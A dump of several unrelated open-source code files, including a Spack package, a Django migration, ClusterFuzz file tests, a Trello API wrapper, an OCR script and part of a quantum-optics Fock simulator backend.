    homepage = "http://www.maizegenetics.net/tassel"
    git = "https://bitbucket.org/tasseladmin/tassel-5-standalone.git"

    version('2017-07-22', commit='<PASSWORD>')

    depends_on('java', type=('build', 'run'))
    depends_on('perl', type=('build', 'run'))

    def install(self, spec, prefix):
        install_tree('.', prefix.bin)

    def setup_run_environment(self, env):
        env.prepend_path('CLASSPATH', self.prefix.bin.lib)
StarcoderdataPython
112221
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'Praise' db.create_table('staff_directory_praise', ( ('id', self.gf( 'django.db.models.fields.AutoField')(primary_key=True)), ('recipient', self.gf('django.db.models.fields.related.ForeignKey') (to=orm['core.person'])), ('praise_nominator', self.gf( 'django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('cfpb_value', self.gf( 'django.db.models.fields.CharField')(max_length=100)), ('reason', self.gf('django.db.models.fields.TextField')()), ('date_added', self.gf('django.db.models.fields.DateTimeField') (auto_now=True, blank=True)), )) db.send_create_signal('staff_directory', ['Praise']) def backwards(self, orm): # Deleting model 'Praise' db.delete_table('staff_directory_praise') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('<PASSWORD>', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', 
[], {'max_length': '100'}) }, 'core.office_location': { 'Meta': {'object_name': 'OfficeLocation'}, 'city': ('django.db.models.fields.CharField', [], {'max_length': '56'}), 'id': ('django.db.models.fields.CharField', [], {'max_length': '12', 'primary_key': 'True'}), 'state': ('django.db.models.fields.CharField', [], {'max_length': '2'}), 'street': ('django.db.models.fields.CharField', [], {'max_length': '56'}), 'suite': ('django.db.models.fields.CharField', [], {'max_length': '56', 'null': 'True', 'blank': 'True'}), 'zip': ('django.db.models.fields.CharField', [], {'max_length': '10'}) }, 'core.orggroup': { 'Meta': {'object_name': 'OrgGroup'}, 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OrgGroup']", 'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '128'}) }, 'core.person': { 'Meta': {'object_name': 'Person'}, 'allow_tagging': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'current_projects': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'desk_location': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}), 'email_notifications': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'home_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'mobile_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}), 'office_location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OfficeLocation']", 'null': 'True', 'blank': 'True'}), 'office_phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}), 'org_group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.OrgGroup']", 'null': 'True', 'blank': 'True'}), 'photo_file': ('core.thumbs.ImageWithThumbsField', [], {'default': "'avatars/default.jpg'", 'max_length': '100'}), 'schools_i_attended': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'stub': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}), 'stuff_ive_done': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'things_im_good_at': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}), 'what_i_do': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}) }, 'staff_directory.praise': { 'Meta': {'object_name': 'Praise'}, 'cfpb_value': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'praise_nominator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'reason': ('django.db.models.fields.TextField', [], {}), 'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Person']"}) }, 
'taggit.tag': { 'Meta': {'object_name': 'Tag'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '150'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}) }, 'taggit.category': { 'Meta': {'object_name': 'TagCategory'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}) }, 'taggit.taggeditem': { 'Meta': {'object_name': 'TaggedItem'}, 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}), 'create_timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}), 'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"}), 'tag_category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['taggit.TagCategory']", 'null': 'True'}), 'tag_creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_related'", 'null': 'True', 'to': "orm['auth.User']"}) } } complete_apps = ['staff_directory']
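# --- Illustrative sketch (added; not part of the original migration) ---
# Roughly the Django model that forwards() above materialises, inferred
# from the frozen ORM dict. App layout and import paths are assumptions,
# so it is left commented out rather than executed inside the migration.
#
#   from django.contrib.auth.models import User
#   from django.db import models
#
#   class Praise(models.Model):
#       recipient = models.ForeignKey('core.Person')
#       praise_nominator = models.ForeignKey(User)
#       cfpb_value = models.CharField(max_length=100)
#       reason = models.TextField()
#       date_added = models.DateTimeField(auto_now=True)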
StarcoderdataPython
3238385
<filename>src/clusterfuzz/_internal/tests/core/bot/untrusted_runner/file_impl_test.py
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for file_impl."""

import os

import mock
from pyfakefs import fake_filesystem_unittest

from clusterfuzz._internal.bot.untrusted_runner import config
from clusterfuzz._internal.bot.untrusted_runner import file_impl
from clusterfuzz._internal.protos import untrusted_runner_pb2
from clusterfuzz._internal.tests.test_libs import test_utils


class FileImplTest(fake_filesystem_unittest.TestCase):
  """FileImpl tests."""

  def setUp(self):
    test_utils.set_up_pyfakefs(self)

  def test_create_directory(self):
    """Test file_impl.create_directory."""
    request = untrusted_runner_pb2.CreateDirectoryRequest(
        path='/dir', create_intermediates=False)
    response = file_impl.create_directory(request, None)
    self.assertTrue(response.result)
    self.assertTrue(os.path.isdir('/dir'))

    request = untrusted_runner_pb2.CreateDirectoryRequest(
        path='/dir2/dir2', create_intermediates=False)
    response = file_impl.create_directory(request, None)
    self.assertFalse(response.result)
    self.assertFalse(os.path.isdir('/dir2/dir2'))

    request = untrusted_runner_pb2.CreateDirectoryRequest(
        path='/dir3/dir3', create_intermediates=True)
    response = file_impl.create_directory(request, None)
    self.assertTrue(response.result)
    self.assertTrue(os.path.isdir('/dir3/dir3'))

  def test_remove_directory(self):
    """Test file_impl.remove_directory."""
    os.mkdir('/dir')
    request = untrusted_runner_pb2.RemoveDirectoryRequest(
        path='/dir', recreate=False)
    response = file_impl.remove_directory(request, None)
    self.assertTrue(response.result)
    self.assertFalse(os.path.isdir('/dir'))

    os.mkdir('/dir')
    request = untrusted_runner_pb2.RemoveDirectoryRequest(
        path='/dir', recreate=True)
    response = file_impl.remove_directory(request, None)
    self.assertTrue(response.result)
    self.assertTrue(os.path.isdir('/dir'))

  def test_copy_file_to_worker(self):
    """Test file_impl.copy_file_to_worker."""
    request_iterator = (
        untrusted_runner_pb2.FileChunk(data=b'A'),
        untrusted_runner_pb2.FileChunk(data=b'B'),
        untrusted_runner_pb2.FileChunk(data=b'C'),
    )

    context = mock.MagicMock()
    context.invocation_metadata.return_value = (('path-bin', b'/file'),)

    response = file_impl.copy_file_to_worker(request_iterator, context)
    self.assertTrue(response.result)
    self.assertTrue(os.path.exists('/file'))
    with open('/file') as f:
      self.assertEqual('ABC', f.read())

  def test_stat(self):
    """Test file_impl.stat."""
    self.fs.create_file('/file')

    request = untrusted_runner_pb2.StatRequest(path='/file')
    response = file_impl.stat(request, None)

    expected = os.stat('/file')
    self.assertTrue(response.result)
    self.assertEqual(expected.st_mode, response.st_mode)
    self.assertEqual(expected.st_size, response.st_size)
    self.assertEqual(expected.st_atime, response.st_atime)
    self.assertEqual(expected.st_ctime, response.st_ctime)
    self.assertEqual(expected.st_mtime, response.st_mtime)

  def test_stat_does_not_exist(self):
    """Test file_impl.stat (does not exist)."""
    request = untrusted_runner_pb2.StatRequest(path='/file')
    response = file_impl.stat(request, None)
    self.assertFalse(response.result)

  def test_copy_file_to_worker_create_intermediate(self):
    """Test file_impl.copy_file_to_worker (create intermediates)."""
    request_iterator = (
        untrusted_runner_pb2.FileChunk(data=b'A'),
        untrusted_runner_pb2.FileChunk(data=b'B'),
        untrusted_runner_pb2.FileChunk(data=b'C'),
    )

    context = mock.MagicMock()
    context.invocation_metadata.return_value = (('path-bin',
                                                 b'/new_dir/file'),)

    response = file_impl.copy_file_to_worker(request_iterator, context)
    self.assertTrue(response.result)
    self.assertTrue(os.path.exists('/new_dir/file'))
    with open('/new_dir/file') as f:
      self.assertEqual('ABC', f.read())

  def test_copy_file_to_worker_create_dir_is_a_file(self):
    """Test file_impl.copy_file_to_worker when the directory is an existing
    file."""
    request_iterator = (
        untrusted_runner_pb2.FileChunk(data=b'A'),
        untrusted_runner_pb2.FileChunk(data=b'B'),
        untrusted_runner_pb2.FileChunk(data=b'C'),
    )

    self.fs.create_file('/file')

    context = mock.MagicMock()
    context.invocation_metadata.return_value = (('path-bin', b'/file/file'),)

    response = file_impl.copy_file_to_worker(request_iterator, context)
    self.assertFalse(response.result)
    self.assertTrue(os.path.isfile('/file'))

  def test_copy_file_to_worker_create_dir_error(self):
    """Test file_impl.copy_file_to_worker when we fail to create intermediate
    dirs."""
    request_iterator = (
        untrusted_runner_pb2.FileChunk(data=b'A'),
        untrusted_runner_pb2.FileChunk(data=b'B'),
        untrusted_runner_pb2.FileChunk(data=b'C'),
    )

    self.fs.create_file('/file')

    context = mock.MagicMock()
    context.invocation_metadata.return_value = (('path-bin',
                                                 b'/file/dir/file'),)

    response = file_impl.copy_file_to_worker(request_iterator, context)
    self.assertFalse(response.result)
    self.assertTrue(os.path.isfile('/file'))

  def test_copy_file_from_worker(self):
    """Test file_impl.copy_file_from_worker."""
    contents = (b'A' * config.FILE_TRANSFER_CHUNK_SIZE +
                b'B' * config.FILE_TRANSFER_CHUNK_SIZE +
                b'C' * config.FILE_TRANSFER_CHUNK_SIZE)
    self.fs.create_file('/file', contents=contents)

    request = untrusted_runner_pb2.CopyFileFromRequest(path='/file')
    context = mock.MagicMock()

    response = file_impl.copy_file_from_worker(request, context)
    chunks = [chunk.data for chunk in response]
    self.assertEqual(len(chunks), 3)
    self.assertEqual(contents, b''.join(chunks))
    context.set_trailing_metadata.assert_called_with([('result', 'ok')])

  def test_copy_file_from_worker_failed(self):
    """Test file_impl.copy_file_from_worker."""
    request = untrusted_runner_pb2.CopyFileFromRequest(path='/file')
    context = mock.MagicMock()

    response = file_impl.copy_file_from_worker(request, context)
    self.assertEqual(0, len(list(response)))
    context.set_trailing_metadata.assert_called_with(
        [('result', 'invalid-path')])
StarcoderdataPython
151647
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this open-source project.
"""
Define the functions to load data.
"""
import os
import json
import argparse
import numpy as np


def load_data(data_dir, interval=100, data_type='2D'):
    music_data, dance_data = [], []
    fnames = sorted(os.listdir(data_dir))
    # fnames = fnames[:10]  # For debug
    for fname in fnames:
        path = os.path.join(data_dir, fname)
        with open(path) as f:
            sample_dict = json.loads(f.read())
            np_music = np.array(sample_dict['music_array'])
            np_dance = np.array(sample_dict['dance_array'])
            if data_type == '2D':
                # Only use 25 keypoints skeleton (basic bone) for 2D
                np_dance = np_dance[:, :50]
                root = np_dance[:, 2*8:2*9]
                np_dance = np_dance - np.tile(root, (1, 25))
                np_dance[:, 2*8:2*9] = root
            seq_len, dim = np_music.shape
            for i in range(0, seq_len, interval):
                music_sub_seq = np_music[i: i + interval]
                dance_sub_seq = np_dance[i: i + interval]
                if len(music_sub_seq) == interval:
                    music_data.append(music_sub_seq)
                    dance_data.append(dance_sub_seq)

    return music_data, dance_data


def load_test_data(data_dir, data_type='2D'):
    music_data, dance_data = [], []
    fnames = sorted(os.listdir(data_dir))
    print(fnames)
    # fnames = fnames[:60]  # For debug
    for fname in fnames:
        path = os.path.join(data_dir, fname)
        with open(path) as f:
            sample_dict = json.loads(f.read())
            np_music = np.array(sample_dict['music_array'])
            np_dance = np.array(sample_dict['dance_array'])
            if data_type == '2D':
                # Only use 25 keypoints skeleton (basic bone) for 2D
                np_dance = np_dance[:, :50]
                root = np_dance[:, 2*8:2*9]
                np_dance = np_dance - np.tile(root, (1, 25))
                np_dance[:, 2*8:2*9] = root
            music_data.append(np_music)
            dance_data.append(np_dance)

    return music_data, dance_data, fnames


def load_json_data(data_file, max_seq_len=150):
    music_data = []
    dance_data = []
    count = 0
    total_count = 0
    with open(data_file) as f:
        data_list = json.loads(f.read())
        for data in data_list:
            # The first and last segment may be unusable
            music_segs = data['music_segments']
            dance_segs = data['dance_segments']

            assert len(music_segs) == len(dance_segs), 'alignment'

            for i in range(len(music_segs)):
                total_count += 1
                if len(music_segs[i]) > max_seq_len:
                    count += 1
                    continue
                music_data.append(music_segs[i])
                dance_data.append(dance_segs[i])

    rate = count / total_count
    print(f'total num of segments: {total_count}')
    print(f'num of segments length > {max_seq_len}: {count}')
    print(f'the rate: {rate}')

    return music_data, dance_data


def str2bool(v):
    if v.lower() in ('yes', 'true', 't', 'y', '1'):
        return True
    elif v.lower() in ('no', 'false', 'f', 'n', '0'):
        return False
    else:
        raise argparse.ArgumentTypeError('Boolean value expected.')
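# --- Usage sketch (added; illustrative only) ---
# The directory path is an assumption; it should contain JSON files with
# 'music_array' and 'dance_array' keys, as load_data expects.
if __name__ == '__main__':
    music, dance = load_data('data/train_json', interval=100, data_type='2D')
    print(f'loaded {len(music)} aligned music/dance segments')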
StarcoderdataPython
136831
import json import requests class Actions(object): __module__ = 'trello' def __init__(self, apikey, token=None): self._apikey = apikey self._token = token def get(self, idAction, display=None, entities=None, fields=None, member=None, member_fields=None, memberCreator=None, memberCreator_fields=None): resp = requests.get("https://trello.com/1/actions/{}".format(idAction), params={"key": self._apikey, "token": self._token, "display": display, "entities": entities, "fields": fields, "member": member, "member_fields": member_fields, "memberCreator": memberCreator, "memberCreator_fields": memberCreator_fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_board(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/board".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_board_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/board/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_card(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/card".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_card_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/card/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_display(self, idAction): resp = requests.get("https://trello.com/1/actions/{}/display".format(idAction), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_entitie(self, idAction): resp = requests.get("https://trello.com/1/actions/{}/entities".format(idAction), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_list(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/list".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_list_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/list/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_member(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/member".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_member_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/member/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_memberCreator(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/memberCreator".format(idAction), params={"key": self._apikey, 
"token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_memberCreator_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/memberCreator/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_organization(self, idAction, fields=None): resp = requests.get("https://trello.com/1/actions/{}/organization".format(idAction), params={"key": self._apikey, "token": self._token, "fields": fields}, data=None) resp.raise_for_status() return json.loads(resp.text) def get_organization_field(self, field, idAction): resp = requests.get("https://trello.com/1/actions/{}/organization/{}".format(idAction, field), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text) def update(self, idAction, text=None): resp = requests.put("https://trello.com/1/actions/{}".format(idAction), params={"key": self._apikey, "token": self._token}, data={"text": text}) resp.raise_for_status() return json.loads(resp.text) def update_text(self, idAction, value): resp = requests.put("https://trello.com/1/actions/{}/text".format(idAction), params={"key": self._apikey, "token": self._token}, data={"value": value}) resp.raise_for_status() return json.loads(resp.text) def delete(self, idAction): resp = requests.delete("https://trello.com/1/actions/{}".format(idAction), params={"key": self._apikey, "token": self._token}, data=None) resp.raise_for_status() return json.loads(resp.text)
StarcoderdataPython
166178
servo_a_pw = [[-90.0, 2463], [-86.4, 2423], [-72.0, 2263], [-56.6, 2093],
              [-43.2, 2013], [-28.8, 1793], [-14.4, 1646], [0.0, 1436],
              [14.4, 1276], [28.8, 1096], [43.2, 916], [56.6, 746],
              [72.0, 586], [72.0, 590], [90.0, 390]]
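# --- Illustration (added; not in the original file) ---
# The pairs above read like an angle -> pulse-width calibration table for a
# servo ("servo_a_pw"); that reading is an assumption. A simple linear
# interpolation over the table could look like this:
def angle_to_pulse(angle, table=servo_a_pw):
    """Linearly interpolate a pulse width for the given angle."""
    pts = sorted(table)  # sort by angle
    if not pts[0][0] <= angle <= pts[-1][0]:
        raise ValueError('angle outside calibration range')
    for (a0, p0), (a1, p1) in zip(pts, pts[1:]):
        if a0 <= angle <= a1:
            if a1 == a0:  # table has duplicate angle entries (e.g. 72.0)
                return p0
            return p0 + (angle - a0) * (p1 - p0) / (a1 - a0)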
StarcoderdataPython
3266469
<reponame>JKamlah/ocromore<filename>test_code/test_pytesseract.py
# ! /usr/bin/python3.6
# -*- coding: utf-8 -*-

"""
This is a script for testing different python3.6/python features and basic
functionality, just to learn python from scratch and by doing.
I intend to stick to the PEP-8 coding guidelines.
"""

import os

try:
    import Image
except ImportError:
    from PIL import Image

import pytesseract

pytesseract.pytesseract.tesseract_cmd = '/usr/local/bin/tesseract'

# TESSERACT_CONFIG
# psm 11  Sparse text. Find as much text as possible in no particular order
# => just for testing (3 is default)
TESSERACT_CONFIG = \
    '--oem 3 \
    --psm 11 \
    --tessdata-dir "/home/johannes/Repos/tesseract/tessdata/tessdata_fast"'

IMAGE_PATH = '/media/sf_firmprofiles/many_years_firmprofiles/short/oneprof'
FILENAME = 'oneprof.jpg'

filepath = os.path.join(IMAGE_PATH, FILENAME)
image = Image.open(filepath)
# text = pytesseract.image_to_string(image)
print(pytesseract.__doc__)

text = pytesseract.image_to_string(
    image,
    lang='deu',
    config=TESSERACT_CONFIG
)
print("Converted image at", filepath, " to text: ", text)
StarcoderdataPython
56969
<filename>strawberryfields/backends/fockbackend/circuit.py # Copyright 2018 Xanadu Quantum Technologies Inc. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fock backend proper ====================== Contains most of the code for managing the simulator state and offloading operations to the utilities in ops. Hyperlinks: :class:`QReg` .. currentmodule:: strawberryfields.backends.fockbackend.circuit Contents ---------------------- .. autosummary:: QReg """ # pylint: disable=too-many-arguments,len-as-condition,attribute-defined-outside-init # pylint: disable=too-many-branches,too-many-locals,too-many-public-methods import copy import string import numbers from itertools import product import numpy as np from numpy import sqrt, pi from scipy.special import factorial as bang from . import ops indices = string.ascii_lowercase MAX_MODES = len(indices) - 3 def_mode = 'blas' class QReg(): """ Class implementing a basic simulator for a collection of modes in the fock basis. """ def __init__(self, num, trunc, hbar=2, pure=True, do_checks=False, mode=def_mode): r"""Class initializer. Args: num (non-negative int): Number of modes in the register. trunc (positive int): Truncation parameter. Modes with up to trunc-1 modes are representable hbar (int): The value of :math:`\hbar` to initialise the circuit with, depending on the conventions followed. By default, :math:`\hbar=2`. See :ref:`conventions` for more details. pure (bool, optional): Whether states are pure (True) or mixed (False) do_checks (bool, optional): Whether arguments are to be checked first """ # Check validity if num < 0: raise ValueError("Number of modes must be non-negative -- got {}".format(num)) elif num > MAX_MODES: raise ValueError("Fock simulator has a maximum of {} modes".format(MAX_MODES)) elif trunc <= 0: raise ValueError("Truncation must be positive -- got {}".format(trunc)) self._num_modes = num self._trunc = trunc self._hbar = hbar self._checks = do_checks self._pure = pure self._mode = mode self.reset(None) def _apply_gate(self, mat, modes): """Master gate application function. Selects between implementations based on the `_mode` class parameter. Args: mat (array): The matrix to apply modes (list<non-negative int>): The modes to apply `mat` to """ args = [mat, self._state, self._pure, modes, self._num_modes, self._trunc] if self._mode == 'blas': self._state = ops.apply_gate_BLAS(*args) elif self._mode == 'einsum': self._state = ops.apply_gate_einsum(*args) else: raise NotImplementedError def _apply_channel(self, kraus_ops, modes): """Master channel application function. Applies a channel represented by Kraus operators. .. note:: Always results in a mixed state. 
Args: kraus_ops (list<array>): A list of Kraus operators modes (list<non-negative int>): The modes to apply the channel to """ if self._pure: self._state = ops.mix(self._state, self._num_modes) self._pure = False if len(kraus_ops) == 0: self._state = np.zeros([self._trunc for i in range(self._num_modes*2)], dtype=ops.def_type) elif self._mode == 'blas': states = [ops.apply_gate_einsum(k, np.copy(self._state), False, modes, self._num_modes, self._trunc)\ for k in kraus_ops] self._state = sum(states) elif self._mode == 'einsum': states = [ops.apply_gate_einsum(k, self._state, False, modes, self._num_modes, self._trunc)\ for k in kraus_ops] self._state = sum(states) def reset(self, pure=None, num_subsystems=None): """Resets the simulation state. Args: pure (bool, optional): Sets the purity setting. Default is unchanged. num_subsystems (int, optional): Sets the number of modes in the reset circuit. Default is unchanged. """ if pure is not None: self._pure = pure if num_subsystems is not None: self._num_modes = num_subsystems if self._pure: self._state = ops.vacuumState(self._num_modes, self._trunc) else: self._state = ops.vacuumStateMixed(self._num_modes, self._trunc) def norm(self): """returns the norm of the state""" if self._pure: return sqrt(np.vdot(self._state, self._state).real) return ops.trace(self._state, self._num_modes) def alloc(self, n=1): """allocate a number of modes at the end of the state.""" # base_shape = [self._trunc for i in range(n)] if self._pure: vac = ops.vacuumState(n, self._trunc) else: vac = ops.vacuumStateMixed(n, self._trunc) self._state = ops.tensor(self._state, vac, self._num_modes, self._pure) self._num_modes = self._num_modes + n def dealloc(self, modes): """Traces out and deallocates the modes in `modes`""" if self._pure: self._state = ops.mix(self._state, self._num_modes) self._pure = False self._state = ops.partial_trace(self._state, self._num_modes, modes) self._num_modes = self._num_modes - len(modes) def prepare(self, state, mode): r""" Prepares a given mode in a given state. Assumes the state of the entire system is of the form :math:`\ket{0}\otimes\ket{\psi}`, up to mode permutations. In particular, the mode may retain any previous phase shift. Args: state (array or matrix): The new state in the fock basis mode (non-negative int): The overwritten mode """ # Do consistency checks pure_shape = (self._trunc,) # mixed_shape = (self._trunc, self._trunc) if self._checks: if (self._pure and state.shape != (self._trunc,)) or \ (not (self._pure) and state.shape != (self._trunc, self._trunc)): raise ValueError("Incorrect shape for state preparation") if self._num_modes == 1: # Hack for marginally faster state preparation self._state = state.astype(ops.def_type) self._pure = bool(state.shape == pure_shape) else: if self._pure: self._state = ops.mix(self._state, self._num_modes) self._pure = False if state.shape != (self._trunc, self._trunc): state = np.outer(state, state.conj()) # Take the partial trace reduced_state = ops.partial_trace(self._state, self._num_modes, [mode]) # Insert state self._state = ops.tensor(reduced_state, state, self._num_modes-1, self._pure, pos=mode) def prepare_mode_fock(self, n, mode): """ Prepares a mode in a fock state. """ if self._pure: self.prepare(ops.fockState(n, self._trunc), mode) else: st = ops.fockState(n, self._trunc) self.prepare(np.outer(st, st.conjugate()), mode) def prepare_mode_coherent(self, alpha, mode): """ Prepares a mode in a coherent state. 
""" if self._pure: self.prepare(ops.coherentState(alpha, self._trunc), mode) else: st = ops.coherentState(alpha, self._trunc) self.prepare(np.outer(st, st.conjugate()), mode) def prepare_mode_squeezed(self, r, theta, mode): """ Prepares a mode in a squeezed state. """ if self._pure: self.prepare(ops.squeezedState(r, theta, self._trunc), mode) else: st = ops.squeezedState(r, theta, self._trunc) self.prepare(np.outer(st, st.conjugate()), mode) def prepare_mode_displaced_squeezed(self, alpha, r, phi, mode): """ Prepares a mode in a displaced squeezed state. """ if self._pure: self.prepare(ops.displacedSqueezed(alpha, r, phi, self._trunc), mode) else: st = ops.displacedSqueezed(alpha, r, phi, self._trunc) self.prepare(np.outer(st, st.conjugate()), mode) def prepare_mode_thermal(self, nbar, mode): """ Prepares a mode in a thermal state. """ st = ops.thermalState(nbar, self._trunc) self.prepare(st, mode) def phase_shift(self, theta, mode): """ Applies a phase shifter. """ self._apply_gate(ops.phase(theta, self._trunc), [mode]) def displacement(self, alpha, mode): """ Applies a displacement gate. """ 